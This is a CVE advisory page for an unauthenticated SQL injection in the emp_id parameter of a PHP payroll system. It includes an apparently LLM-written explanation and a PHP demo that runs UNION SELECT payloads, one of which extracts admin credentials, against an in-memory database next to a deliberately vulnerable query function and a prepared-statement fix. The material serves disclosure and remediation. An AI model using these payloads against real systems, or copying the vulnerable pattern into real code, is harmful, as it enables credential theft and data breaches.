CVE-2026-37346
Description
SourceCodester Payroll Management and Information System v1.0 is vulnerable to SQL Injection in the file /payroll/view_account.php?emp_id=.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
An SQL injection vulnerability in SourceCodester Payroll Management and Information System v1.0 allows unauthenticated attackers to extract database contents via the `emp_id` parameter.
SourceCodester Payroll Management and Information System v1.0 contains a SQL injection vulnerability in the /payroll/view_account.php endpoint. The emp_id GET parameter is concatenated directly into an SQL query without validation or parameterization, a classic SQL injection flaw [1]. The application is written in PHP (the report's test environment was PHP 8.1 on XAMPP) and fetches employee account data with a simple GET request.
Exploitation is reported to require no authentication: the attacker sends a crafted GET request to /payroll/view_account.php with a malicious emp_id value. For example, the URL-encoded payload 0%27%20union%20select%201,database(),3,4,5,6,7,8,9--+ (which decodes to 0' union select 1,database(),3,4,5,6,7,8,9-- ) closes the string literal, appends a UNION SELECT whose column count matches the original query, and returns the result of MySQL's database() function (e.g., 'payroll') in the second column; the same technique reads any other table the application's database user can access [1]. The attack is low complexity and can be launched from any network position that can reach the application.
Successful exploitation lets an attacker read arbitrary data from the application's database, including administrative credentials, employee records, payroll data, and other sensitive information. Because that database holds the application's backend state, an attacker who recovers credentials can escalate to account takeover and further compromise of the system [1].
As of the publication date (April 2026), the vendor (SourceCodester) has not released a patch and the product remains vulnerable. Deployers should validate emp_id as an integer and replace string-concatenated queries with prepared statements (bound parameters); running the application with a least-privilege database account limits what an injection can read. The CVE is not listed in CISA's Known Exploited Vulnerabilities catalog at this time.
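The concatenation pattern the advisory describes, the page's UNION payload run against it, and the prepared-statement fix, as an added example that is not SourceCodester's code (the real view_account.php has not been reproduced here). It runs against an in-memory SQLite database, so MySQL's database() is swapped for SQLite's sqlite_version(); the employee and users tables, their nine-column layout and the sample rows are constructed for the demonstration. The functions viewAccountVulnerable and viewAccountSafe are hypothetical names.

```php
<?php
// Added example, not the project's code. Reproduces the emp_id injection
// pattern against an in-memory SQLite database (PDO, pdo_sqlite required)
// and shows the hardened handler beside it. Schema and rows are constructed.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed schema: nine columns so the page's nine-value UNION lines up.
$pdo->exec('CREATE TABLE employee (emp_id INTEGER PRIMARY KEY, firstname TEXT,
            lastname TEXT, position TEXT, department TEXT, salary REAL,
            account_no TEXT, bank TEXT, status TEXT)');
$pdo->exec("INSERT INTO employee VALUES (1,'Ana','Cruz','Clerk','Finance',
            32000,'0011-2233','BankA','active')");
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$pdo->exec("INSERT INTO users VALUES (1,'admin','constructed-secret')");

// Vulnerable pattern: the request value is spliced into the SQL string.
function viewAccountVulnerable(PDO $pdo, string $empId): array
{
    $sql = "SELECT * FROM employee WHERE emp_id = '" . $empId . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: emp_id is numeric, so reject anything else, then bind it.
function viewAccountSafe(PDO $pdo, string $empId): array
{
    if (!ctype_digit($empId)) {
        throw new InvalidArgumentException('emp_id must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT * FROM employee WHERE emp_id = :id');
    $stmt->execute([':id' => (int) $empId]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// The page's payload as PHP would see it after $_GET decoding ("+" becomes the
// space that makes "-- " a valid comment). database() -> sqlite_version() here.
$probe = urldecode('0%27%20union%20select%201,sqlite_version(),3,4,5,6,7,8,9--+');
$rows  = viewAccountVulnerable($pdo, $probe);
printf("vulnerable, probe:  %s\n", json_encode($rows));   // column 2 = DB version

// Same trick aimed at the credentials table.
$creds = urldecode("0%27%20union%20select%201,(select%20username||':'||password%20from%20users),3,4,5,6,7,8,9--+");
$rows  = viewAccountVulnerable($pdo, $creds);
printf("vulnerable, creds:  %s\n", json_encode($rows));   // column 2 = admin:constructed-secret

// Hardened handler: the payload never reaches the SQL parser.
try {
    viewAccountSafe($pdo, $probe);
} catch (InvalidArgumentException $e) {
    printf("hardened, probe:    rejected (%s)\n", $e->getMessage());
}
printf("hardened, emp_id=1: %s\n", json_encode(viewAccountSafe($pdo, '1')));
```

Two points worth noting when checking a deployment: the UNION only succeeds when the injected SELECT has the same column count as the original query, which is why the reported payload carries nine values and why a probe against a live system usually starts with ORDER BY or column-count guessing; and because emp_id is sent as a GET parameter, past exploitation attempts are visible in the web server access log as requests to view_account.php whose emp_id contains %27, union or -- rather than digits only.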
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: = v1.0
Patches
No patches discovered yet.
References
News mentions
No linked articles in our index yet.